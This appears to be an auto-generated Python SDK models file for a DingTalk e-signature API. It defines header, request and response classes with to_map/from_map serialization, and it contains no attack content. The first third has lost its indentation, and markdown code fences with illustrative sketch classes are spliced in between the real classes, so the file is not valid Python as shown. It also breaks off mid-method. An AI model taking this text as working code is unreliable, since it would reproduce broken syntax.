def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = GetFileInfoResponseBody()
self.body = temp_model.from_map(m['body'])
return self
class ChannelOrdersHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
service_group: str = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.service_group = service_group
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.service_group is not None:
result['serviceGroup'] = self.service_group
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('serviceGroup') is not None:
self.service_group = m.get('serviceGroup')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class ChannelOrdersRequest(TeaModel):
def __init__(
self,
ding_corp_id: str = None,
order_id: str = None,
item_code: str = None,
item_name: str = None,
quantity: float = None,
pay_fee: float = None,
order_create_time: float = None,
):
self.ding_corp_id = ding_corp_id
# The ISV-side order ID (used for idempotency; please ensure uniqueness).
self.order_id = order_id
# Item ID.
self.item_code = item_code
# Item name.
self.item_name = item_name
# Purchase quantity.
self.quantity = quantity
# Payment amount in cents (fen); recorded for reference only, not used as a payment credential.
self.pay_fee = pay_fee
# Order creation time.
self.order_create_time = order_create_time
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.ding_corp_id is not None:
result['dingCorpId'] = self.ding_corp_id
if self.order_id is not None:
result['orderId'] = self.order_id
if self.item_code is not None:
result['itemCode'] = self.item_code
if self.item_name is not None:
result['itemName'] = self.item_name
if self.quantity is not None:
result['quantity'] = self.quantity
if self.pay_fee is not None:
result['payFee'] = self.pay_fee
if self.order_create_time is not None:
result['orderCreateTime'] = self.order_create_time
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('dingCorpId') is not None:
self.ding_corp_id = m.get('dingCorpId')
if m.get('orderId') is not None:
self.order_id = m.get('orderId')
if m.get('itemCode') is not None:
self.item_code = m.get('itemCode')
if m.get('itemName') is not None:
self.item_name = m.get('itemName')
if m.get('quantity') is not None:
self.quantity = m.get('quantity')
if m.get('payFee') is not None:
self.pay_fee = m.get('payFee')
if m.get('orderCreateTime') is not None:
self.order_create_time = m.get('orderCreateTime')
return self
class ChannelOrdersResponseBody(TeaModel):
def __init__(
self,
esign_order_id: str = None,
):
self.esign_order_id = esign_order_id
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.esign_order_id is not None:
result['esignOrderId'] = self.esign_order_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('esignOrderId') is not None:
self.esign_order_id = m.get('esignOrderId')
return self
class ChannelOrdersResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: ChannelOrdersResponseBody = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.headers, 'headers')
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = ChannelOrdersResponseBody()
self.body = temp_model.from_map(m['body'])
return self
class ResaleOrderHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
service_group: str = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.service_group = service_group
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.service_group is not None:
result['serviceGroup'] = self.service_group
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('serviceGroup') is not None:
self.service_group = m.get('serviceGroup')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class ResaleOrderRequest(TeaModel):
def __init__(
self,
ding_corp_id: str = None,
order_id: str = None,
quantity: float = None,
order_create_time: float = None,
service_start_time: float = None,
service_stop_time: float = None,
):
self.ding_corp_id = ding_corp_id
# The ISV-side order ID (used for idempotency; please ensure uniqueness).
self.order_id = order_id
# Purchase quantity (number of electronic contracts).
self.quantity = quantity
# Order creation time.
self.order_create_time = order_create_time
# Contract validity start time.
self.service_start_time = service_start_time
# Contract expiration date; the default validity period is one year.
self.service_stop_time = service_stop_time
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.ding_corp_id is not None:
result['dingCorpId'] = self.ding_corp_id
if self.order_id is not None:
result['orderId'] = self.order_id
if self.quantity is not None:
result['quantity'] = self.quantity
if self.order_create_time is not None:
result['orderCreateTime'] = self.order_create_time
if self.service_start_time is not None:
result['serviceStartTime'] = self.service_start_time
if self.service_stop_time is not None:
result['serviceStopTime'] = self.service_stop_time
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('dingCorpId') is not None:
self.ding_corp_id = m.get('dingCorpId')
if m.get('orderId') is not None:
self.order_id = m.get('orderId')
if m.get('quantity') is not None:
self.quantity = m.get('quantity')
if m.get('orderCreateTime') is not None:
self.order_create_time = m.get('orderCreateTime')
if m.get('serviceStartTime') is not None:
self.service_start_time = m.get('serviceStartTime')
if m.get('serviceStopTime') is not None:
self.service_stop_time = m.get('serviceStopTime')
return self
class ResaleOrderResponseBody(TeaModel):
def __init__(
self,
esign_order_id: str = None,
):
self.esign_order_id = esign_order_id
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.esign_order_id is not None:
result['esignOrderId'] = self.esign_order_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('esignOrderId') is not None:
self.esign_order_id = m.get('esignOrderId')
return self
class ResaleOrderResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: ResaleOrderResponseBody = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.headers, 'headers')
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = ResaleOrderResponseBody()
self.body = temp_model.from_map(m['body'])
return self
class CancelCorpAuthHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
service_group: str = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.service_group = service_group
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.service_group is not None:
result['serviceGroup'] = self.service_group
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('serviceGroup') is not None:
self.service_group = m.get('serviceGroup')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class CancelCorpAuthRequest(TeaModel):
def __init__(
self,
ding_corp_id: str = None,
):
self.ding_corp_id = ding_corp_id
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.ding_corp_id is not None:
result['dingCorpId'] = self.ding_corp_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('dingCorpId') is not None:
self.ding_corp_id = m.get('dingCorpId')
return self
class CancelCorpAuthResponseBody(TeaModel):
def __init__(
self,
result: bool = None,
):
self.result = result
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.result is not None:
result['result'] = self.result
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('result') is not None:
self.result = m.get('result')
return self
class CancelCorpAuthResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: CancelCorpAuthResponseBody = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.headers, 'headers')
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = CancelCorpAuthResponseBody()
self.body = temp_model.from_map(m['body'])
return self
class GetFileUploadUrlHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
service_group: str = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.service_group = service_group
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.service_group is not None:
result['serviceGroup'] = self.service_group
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('serviceGroup') is not None:
self.service_group = m.get('serviceGroup')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class GetFileUploadUrlRequest(TeaModel):
def __init__(
self,
ding_corp_id: str = None,
content_md_5: str = None,
content_type: str = None,
file_name: str = None,
file_size: int = None,
convert_2pdf: bool = None,
):
self.ding_corp_id = ding_corp_id
self.content_md_5 = content_md_5
self.content_type = content_type
self.file_name = file_name
self.file_size = file_size
self.convert_2pdf = convert_2pdf
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.ding_corp_id is not None:
result['dingCorpId'] = self.ding_corp_id
if self.content_md_5 is not None:
result['contentMd5'] = self.content_md_5
if self.content_type is not None:
result['contentType'] = self.content_type
if self.file_name is not None:
result['fileName'] = self.file_name
if self.file_size is not None:
result['fileSize'] = self.file_size
if self.convert_2pdf is not None:
result['convert2Pdf'] = self.convert_2pdf
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('dingCorpId') is not None:
self.ding_corp_id = m.get('dingCorpId')
if m.get('contentMd5') is not None:
self.content_md_5 = m.get('contentMd5')
if m.get('contentType') is not None:
self.content_type = m.get('contentType')
if m.get('fileName') is not None:
self.file_name = m.get('fileName')
if m.get('fileSize') is not None:
self.file_size = m.get('fileSize')
if m.get('convert2Pdf') is not None:
self.convert_2pdf = m.get('convert2Pdf')
return self
class GetFileUploadUrlResponseBody(TeaModel):
def __init__(
self,
file_id: str = None,
upload_url: str = None,
):
self.file_id = file_id
self.upload_url = upload_url
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.file_id is not None:
result['fileId'] = self.file_id
if self.upload_url is not None:
result['uploadUrl'] = self.upload_url
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('fileId') is not None:
self.file_id = m.get('fileId')
if m.get('uploadUrl') is not None:
self.upload_url = m.get('uploadUrl')
return self
class GetFileUploadUrlResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: GetFileUploadUrlResponseBody = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.headers, 'headers')
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = GetFileUploadUrlResponseBody()
self.body = temp_model.from_map(m['body'])
return self


class GetIsvStatusHeaders(TeaModel):
    def __init__(
        self,
        common_headers: Dict[str, str] = None,
        service_group: str = None,
        x_acs_dingtalk_access_token: str = None,
    ):
        self.common_headers = common_headers
        self.service_group = service_group
        self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token

    def validate(self):
        pass

    def to_map(self):
        _map = super().to_map()
        if _map is not None:
            return _map

        result = dict()
        if self.common_headers is not None:
            result['commonHeaders'] = self.common_headers
        if self.service_group is not None:
            result['serviceGroup'] = self.service_group
        if self.x_acs_dingtalk_access_token is not None:
            result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
        return result

    def from_map(self, m: dict = None):
        m = m or dict()
        if m.get('commonHeaders') is not None:
            self.common_headers = m.get('commonHeaders')
        if m.get('serviceGroup') is not None:
            self.service_group = m.get('serviceGroup')
        if m.get('x-acs-dingtalk-access-token') is not None:
            self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
        return self


class GetIsvStatusResponseBody(TeaModel):
    def __init__(
        self,
        install_status: str = None,
        auth_status: str = None,
    ):
        self.install_status = install_status
        self.auth_status = auth_status

    def validate(self):
        pass

    def to_map(self):
        _map = super().to_map()
        if _map is not None:
            return _map

        result = dict()
        if self.install_status is not None:
            result['installStatus'] = self.install_status
        if self.auth_status is not None:
            result['authStatus'] = self.auth_status
        return result

    def from_map(self, m: dict = None):
        m = m or dict()
        if m.get('installStatus') is not None:
            self.install_status = m.get('installStatus')
        if m.get('authStatus') is not None:
            self.auth_status = m.get('authStatus')
        return self


class GetIsvStatusResponse(TeaModel):
    def __init__(
        self,
        headers: Dict[str, str] = None,
        body: GetIsvStatusResponseBody = None,
    ):
        self.headers = headers
        self.body = body

    def validate(self):
        self.validate_required(self.headers, 'headers')
        self.validate_required(self.body, 'body')
        if self.body:
            self.body.validate()

    def to_map(self):
        _map = super().to_map()
        if _map is not None:
            return _map

        result = dict()
        if self.headers is not None:
            result['headers'] = self.headers
        if self.body is not None:
            result['body'] = self.body.to_map()
        return result

    def from_map(self, m: dict = None):
        m = m or dict()
        if m.get('headers') is not None:
            self.headers = m.get('headers')
        if m.get('body') is not None:
            temp_model = GetIsvStatusResponseBody()
            self.body = temp_model.from_map(m['body'])
        return self


class GetFlowDocsHeaders(TeaModel):
    def __init__(
        self,
        common_headers: Dict[str, str] = None,
        service_group: str = None,
        x_acs_dingtalk_access_token: str = None,
    ):
        self.common_headers = common_headers
        self.service_group = service_group
        self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token

    def validate(self):
        pass

    def to_map(self):
        _map = super().to_map()
        if _map is not None:
            return _map

        result = dict()
        if self.common_headers is not None:
            result['commonHeaders'] = self.common_headers
        if self.service_group is not None:
            result['serviceGroup'] = self.service_group
        if self.x_acs_dingtalk_access_token is not None:
            result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
        return result

    def from_map(self, m: dict = None):
        m = m or dict()
        if m.get('commonHeaders') is not None:
            self.common_headers = m.get('commonHeaders')
        if m.get('serviceGroup') is not None:
            self.service_group = m.get('serviceGroup')
        if m.get('x-acs-dingtalk-access-token') is not None:
            self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
        return self


class GetFlowDocsResponseBodyData(TeaModel):
    def __init__(
        self,
        file_id: str = None,
        file_name: str = None,
        file_url: str = None,
    ):
        self.file_id = file_id
        self.file_name = file_name
        self.file_url = file_url

    def validate(self):
        pass

    def to_map(self):
        _map = super().to_map()
        if _map is not None:
            return _map

        result = dict()
        if self.file_id is not None:
            result['fileId'] = self.file_id
        if self.file_name is not None:
            result['fileName'] = self.file_name
        if self.file_url is not None:
            result['fileUrl'] = self.file_url
        return result

    def from_map(self, m: dict = None):
        m = m or dict()
        if m.get('fileId') is not None:
            self.file_id = m.get('fileId')
        if m.get('fileName') is not None:
            self.file_name = m.get('fileName')
        if m.get('fileUrl') is not None:
            self.file_url = m.get('fileUrl')
        return self


class GetFlowDocsResponseBody(TeaModel):
    def __init__(
        self,
        data: List[GetFlowDocsResponseBodyData] = None,
    ):
        self.data = data

    def validate(self):
        if self.data:
            for k in self.data:
                if k:
                    k.validate()

    def to_map(self):
        _map = super().to_map()
        if _map is not None:
            return _map

        result = dict()
        result['data'] = []
        if self.data is not None:
            for k in self.data:
                result['data'].append(k.to_map() if k else None)
        return result

    def from_map(self, m: dict = None):
        m = m or dict()
        self.data = []
        if m.get('data') is not None:
            for k in m.get('data'):
                temp_model = GetFlowDocsResponseBodyData()
                self.data.append(temp_model.from_map(k))
        return self


class GetFlowDocsResponse(TeaModel):
    def __init__(
        self,
        headers: Dict[str, str] = None,
        body: GetFlowDocsResponseBody = None,
    ):
        self.headers = headers
        self.body = body

    def validate(self):
        self.validate_required(self.headers, 'headers')
        self.validate_required(self.body, 'body')
        if self.body:
            self.body.validate()

    def to_map(self):
        _map = super().to_map()
        if _map is not None:
            return _map

        result = dict()
        if self.headers is not None:
            result['headers'] = self.headers
        if self.body is not None:
            result['body'] = self.body.to_map()
        return result

    def from_map(self, m: dict = None):
        m = m or dict()
        if m.get('headers') is not None:
            self.headers = m.get('headers')
        if m.get('body') is not None:
            temp_model = GetFlowDocsResponseBody()
            self.body = temp_model.from_map(m['body'])
        return self
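# The models above all follow the same to_map()/from_map() round-trip pattern,
# including list-typed fields that are serialized element by element. The
# following is a minimal, self-contained sketch of that pattern; the `Doc` and
# `DocList` names are hypothetical stand-ins (not part of this SDK), written so
# the example runs without the TeaModel base class.

```python
from typing import List


class Doc:
    """Hypothetical stand-in for a GetFlowDocsResponseBodyData-style model."""

    def __init__(self, file_id: str = None, file_name: str = None):
        self.file_id = file_id
        self.file_name = file_name

    def to_map(self):
        result = dict()
        if self.file_id is not None:
            result['fileId'] = self.file_id
        if self.file_name is not None:
            result['fileName'] = self.file_name
        return result

    def from_map(self, m: dict = None):
        m = m or dict()
        if m.get('fileId') is not None:
            self.file_id = m.get('fileId')
        if m.get('fileName') is not None:
            self.file_name = m.get('fileName')
        return self


class DocList:
    """Hypothetical stand-in showing how list-typed fields are (de)serialized."""

    def __init__(self, data: List[Doc] = None):
        self.data = data

    def to_map(self):
        result = dict()
        result['data'] = []
        if self.data is not None:
            for k in self.data:
                result['data'].append(k.to_map() if k else None)
        return result

    def from_map(self, m: dict = None):
        m = m or dict()
        self.data = []
        if m.get('data') is not None:
            for k in m.get('data'):
                # each raw dict is hydrated into a fresh child model
                self.data.append(Doc().from_map(k))
        return self


raw = {'data': [{'fileId': '1', 'fileName': 'a.pdf'}]}
model = DocList().from_map(raw)
assert model.data[0].file_name == 'a.pdf'
assert model.to_map() == raw  # round-trip is lossless for set fields
```

# Note that unset (None) fields are simply omitted from the map rather than
# emitted as null, which is why the round-trip only holds for fields that were
# present in the input.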


class UsersRealnameHeaders(TeaModel):
    def __init__(
        self,
        common_headers: Dict[str, str] = None,
        service_group: str = None,
        x_acs_dingtalk_access_token: str = None,
    ):
        self.common_headers = common_headers
        self.service_group = service_group
        self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token

    def validate(self):
        pass

    def to_map(self):
        _map = super().to_map()
        if _map is not None:
            return _map

        result = dict()
        if self.common_headers is not None:
            result['commonHeaders'] = self.common_headers
        if self.service_group is not None:
            result['serviceGroup'] = self.service_group
        if self.x_acs_dingtalk_access_token is not None:
            result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
        return result

    def from_map(self, m: dict = None):
        m = m or dict()
        if m.get('commonHeaders') is not None:
            self.common_headers = m.get('commonHeaders')
        if m.get('serviceGroup') is not None:
            self.service_group = m.get('serviceGroup')
        if m.get('x-acs-dingtalk-access-token') is not None:
            self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
        return self


class UsersRealnameRequest(TeaModel):
    def __init__(
        self,
        user_id: str = None,
        redirect_url: str = None,
        ding_corp_id: str = None,
    ):
        self.user_id = user_id
        self.redirect_url = redirect_url
        self.ding_corp_id = ding_corp_id

    def validate(self):
        pass

    def to_map(self):
        _map = super().to_map()
        if _map is not None:
            return _map

        result = dict()
        if self.user_id is not None:
            result['userId'] = self.user_id
        if self.redirect_url is not None:
            result['redirectUrl'] = self.redirect_url
        if self.ding_corp_id is not None:
            result['dingCorpId'] = self.ding_corp_id
        return result

    def from_map(self, m: dict = None):
        m = m or dict()
        if m.get('userId') is not None:
            self.user_id = m.get('userId')
        if m.get('redirectUrl') is not None:
            self.redirect_url = m.get('redirectUrl')
        if m.get('dingCorpId') is not None:
            self.ding_corp_id = m.get('dingCorpId')
        return self


class UsersRealnameResponseBody(TeaModel):
    def __init__(
        self,
        task_id: str = None,
        pc_url: str = None,
        mobile_url: str = None,
    ):
        self.task_id = task_id
        self.pc_url = pc_url
        self.mobile_url = mobile_url

    def validate(self):
        pass

    def to_map(self):
        _map = super().to_map()
        if _map is not None:
            return _map

        result = dict()
        if self.task_id is not None:
            result['taskId'] = self.task_id
        if self.pc_url is not None:
            result['pcUrl'] = self.pc_url
        if self.mobile_url is not None:
            result['mobileUrl'] = self.mobile_url
        return result

    def from_map(self, m: dict = None):
        m = m or dict()
        if m.get('taskId') is not None:
            self.task_id = m.get('taskId')
        if m.get('pcUrl') is not None:
            self.pc_url = m.get('pcUrl')
        if m.get('mobileUrl') is not None:
            self.mobile_url = m.get('mobileUrl')
        return self


class UsersRealnameResponse(TeaModel):
    def __init__(
        self,
        headers: Dict[str, str] = None,
        body: UsersRealnameResponseBody = None,
    ):
        self.headers = headers
        self.body = body

    def validate(self):
        self.validate_required(self.headers, 'headers')
        self.validate_required(self.body, 'body')
        if self.body:
            self.body.validate()

    def to_map(self):
        _map = super().to_map()
        if _map is not None:
            return _map

        result = dict()
        if self.headers is not None:
            result['headers'] = self.headers
        if self.body is not None:
            result['body'] = self.body.to_map()
        return result

    def from_map(self, m: dict = None):
        m = m or dict()
        if m.get('headers') is not None:
            self.headers = m.get('headers')
        if m.get('body') is not None:
            temp_model = UsersRealnameResponseBody()
            self.body = temp_model.from_map(m['body'])
        return self


class GetFlowDetailHeaders(TeaModel):
    def __init__(
        self,
        common_headers: Dict[str, str] = None,
        service_group: str = None,
        x_acs_dingtalk_access_token: str = None,
    ):
        self.common_headers = common_headers
        self.service_group = service_group
        self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token

    def validate(self):
        pass

    def to_map(self):
        _map = super().to_map()
        if _map is not None:
            return _map

        result = dict()
        if self.common_headers is not None:
            result['commonHeaders'] = self.common_headers
        if self.service_group is not None:
            result['serviceGroup'] = self.service_group
        if self.x_acs_dingtalk_access_token is not None:
            result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
        return result

    def from_map(self, m: dict = None):
        m = m or dict()
        if m.get('commonHeaders') is not None:
            self.common_headers = m.get('commonHeaders')
        if m.get('serviceGroup') is not None:
            self.service_group = m.get('serviceGroup')
        if m.get('x-acs-dingtalk-access-token') is not None:
            self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
        return self


class GetFlowDetailResponseBodyLogs(TeaModel):
    def __init__(
        self,
        operator_account_name: str = None,
        log_type: str = None,
        operate_description: str = None,
        operate_time: float = None,
    ):
        self.operator_account_name = operator_account_name
        self.log_type = log_type
        self.operate_description = operate_description
        self.operate_time = operate_time

    def validate(self):
        pass

    def to_map(self):
        _map = super().to_map()
        if _map is not None:
            return _map

        result = dict()
        if self.operator_account_name is not None:
            result['operatorAccountName'] = self.operator_account_name
        if self.log_type is not None:
            result['logType'] = self.log_type
        if self.operate_description is not None:
            result['operateDescription'] = self.operate_description
        if self.operate_time is not None:
            result['operateTime'] = self.operate_time
        return result

    def from_map(self, m: dict = None):
        m = m or dict()
        if m.get('operatorAccountName') is not None:
            self.operator_account_name = m.get('operatorAccountName')
        if m.get('logType') is not None:
            self.log_type = m.get('logType')
        if m.get('operateDescription') is not None:
            self.operate_description = m.get('operateDescription')
        if m.get('operateTime') is not None:
            self.operate_time = m.get('operateTime')
        return self


class GetFlowDetailResponseBody(TeaModel):
    def __init__(
        self,
        business_scene: str = None,
        flow_status: float = None,
        initiator_authorized_name: str = None,
        initiator_name: str = None,
        logs: List[GetFlowDetailResponseBodyLogs] = None,
    ):
        self.business_scene = business_scene
        self.flow_status = flow_status
        self.initiator_authorized_name = initiator_authorized_name
        self.initiator_name = initiator_name
        self.logs = logs

    def validate(self):
        if self.logs:
            for k in self.logs:
                if k:
                    k.validate()

    def to_map(self):
        _map = super().to_map()
        if _map is not None:
            return _map

        result = dict()
        if self.business_scene is not None:
            result['businessScene'] = self.business_scene
        if self.flow_status is not None:
            result['flowStatus'] = self.flow_status
        if self.initiator_authorized_name is not None:
            result['initiatorAuthorizedName'] = self.initiator_authorized_name
        if self.initiator_name is not None:
            result['initiatorName'] = self.initiator_name
        result['logs'] = []
        if self.logs is not None:
            for k in self.logs:
                result['logs'].append(k.to_map() if k else None)
        return result

    def from_map(self, m: dict = None):
        m = m or dict()
        if m.get('businessScene') is not None:
            self.business_scene = m.get('businessScene')
        if m.get('flowStatus') is not None:
            self.flow_status = m.get('flowStatus')
        if m.get('initiatorAuthorizedName') is not None:
            self.initiator_authorized_name = m.get('initiatorAuthorizedName')
        if m.get('initiatorName') is not None:
            self.initiator_name = m.get('initiatorName')
        self.logs = []
        if m.get('logs') is not None:
            for k in m.get('logs'):
                temp_model = GetFlowDetailResponseBodyLogs()
                self.logs.append(temp_model.from_map(k))
        return self


class GetFlowDetailResponse(TeaModel):
    def __init__(
        self,
        headers: Dict[str, str] = None,
        body: GetFlowDetailResponseBody = None,
    ):
        self.headers = headers
        self.body = body

    def validate(self):
        self.validate_required(self.headers, 'headers')
        self.validate_required(self.body, 'body')
        if self.body:
            self.body.validate()

    def to_map(self):
        _map = super().to_map()
        if _map is not None:
            return _map

        result = dict()
        if self.headers is not None:
            result['headers'] = self.headers
        if self.body is not None:
            result['body'] = self.body.to_map()
        return result

    def from_map(self, m: dict = None):
        m = m or dict()
        if m.get('headers') is not None:
            self.headers = m.get('headers')
        if m.get('body') is not None:
            temp_model = GetFlowDetailResponseBody()
            self.body = temp_model.from_map(m['body'])
        return self
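# validate() on container models recurses into non-None children and silently
# skips None list entries. A minimal self-contained sketch of that behavior
# (the `Leaf`/`Parent` names are hypothetical stand-ins, not SDK classes):

```python
class Leaf:
    """Hypothetical child model; records that validate() was called."""

    def __init__(self, log_type=None):
        self.log_type = log_type
        self.validated = False

    def validate(self):
        self.validated = True


class Parent:
    """Hypothetical container mirroring GetFlowDetailResponseBody.validate()."""

    def __init__(self, logs=None):
        self.logs = logs

    def validate(self):
        # each non-None child is validated recursively; None entries are skipped
        if self.logs:
            for k in self.logs:
                if k:
                    k.validate()


leaves = [Leaf('sign'), None, Leaf('seal')]
Parent(leaves).validate()
assert leaves[0].validated and leaves[2].validated
Parent(None).validate()  # an unset list is also tolerated
```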


class GetCorpInfoHeaders(TeaModel):
    def __init__(
        self,
        common_headers: Dict[str, str] = None,
        service_group: str = None,
        x_acs_dingtalk_access_token: str = None,
    ):
        self.common_headers = common_headers
        self.service_group = service_group
        self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token

    def validate(self):
        pass

    def to_map(self):
        _map = super().to_map()
        if _map is not None:
            return _map

        result = dict()
        if self.common_headers is not None:
            result['commonHeaders'] = self.common_headers
        if self.service_group is not None:
            result['serviceGroup'] = self.service_group
        if self.x_acs_dingtalk_access_token is not None:
            result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
        return result

    def from_map(self, m: dict = None):
        m = m or dict()
        if m.get('commonHeaders') is not None:
            self.common_headers = m.get('commonHeaders')
        if m.get('serviceGroup') is not None:
            self.service_group = m.get('serviceGroup')
        if m.get('x-acs-dingtalk-access-token') is not None:
            self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
        return self


class GetCorpInfoResponseBody(TeaModel):
    def __init__(
        self,
        is_real_name: str = None,
        org_real_name: str = None,
    ):
        self.is_real_name = is_real_name
        self.org_real_name = org_real_name

    def validate(self):
        pass

    def to_map(self):
        _map = super().to_map()
        if _map is not None:
            return _map

        result = dict()
        if self.is_real_name is not None:
            result['isRealName'] = self.is_real_name
        if self.org_real_name is not None:
            result['orgRealName'] = self.org_real_name
        return result

    def from_map(self, m: dict = None):
        m = m or dict()
        if m.get('isRealName') is not None:
            self.is_real_name = m.get('isRealName')
        if m.get('orgRealName') is not None:
            self.org_real_name = m.get('orgRealName')
        return self


class GetCorpInfoResponse(TeaModel):
    def __init__(
        self,
        headers: Dict[str, str] = None,
        body: GetCorpInfoResponseBody = None,
    ):
        self.headers = headers
        self.body = body

    def validate(self):
        self.validate_required(self.headers, 'headers')
        self.validate_required(self.body, 'body')
        if self.body:
            self.body.validate()

    def to_map(self):
        _map = super().to_map()
        if _map is not None:
            return _map

        result = dict()
        if self.headers is not None:
            result['headers'] = self.headers
        if self.body is not None:
            result['body'] = self.body.to_map()
        return result

    def from_map(self, m: dict = None):
        m = m or dict()
